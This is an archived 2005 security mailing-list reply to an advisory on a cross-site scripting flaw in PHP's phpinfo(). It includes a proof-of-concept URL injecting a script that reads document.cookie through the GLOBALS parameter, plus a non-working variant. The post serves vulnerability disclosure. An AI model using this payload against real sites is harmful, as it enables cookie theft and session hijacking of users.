[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <200511031506.jA3F6D0W088824@mailserver2.hushmail.com>
Date: Thu, 3 Nov 2005 07:06:10 -0800
From: <phole@...hmail.com>
To: <bugtraq@...urityfocus.com>
Cc: red@...sec.de, full-disclosure@...ts.grok.org.uk
Subject: Re: Advisory 18/2005: PHP Cross Site Scripting
(XSS)XVulnerability in phpinfo()
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
great Work
PoC:
phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
this Don't Work:
phpinfo.php?test=<script>alert(document.cookie);</script>
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4
wkYEARECAAYFAkNqJ2EACgkQ3APBCuix8ZmWRACgs0IvvixY6zfmkpJ/9APUtgPLFfgA
oJgOYQ4jbwGaTcJV95ZVyiAQwMXF
=zYsZ
-----END PGP SIGNATURE-----
Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists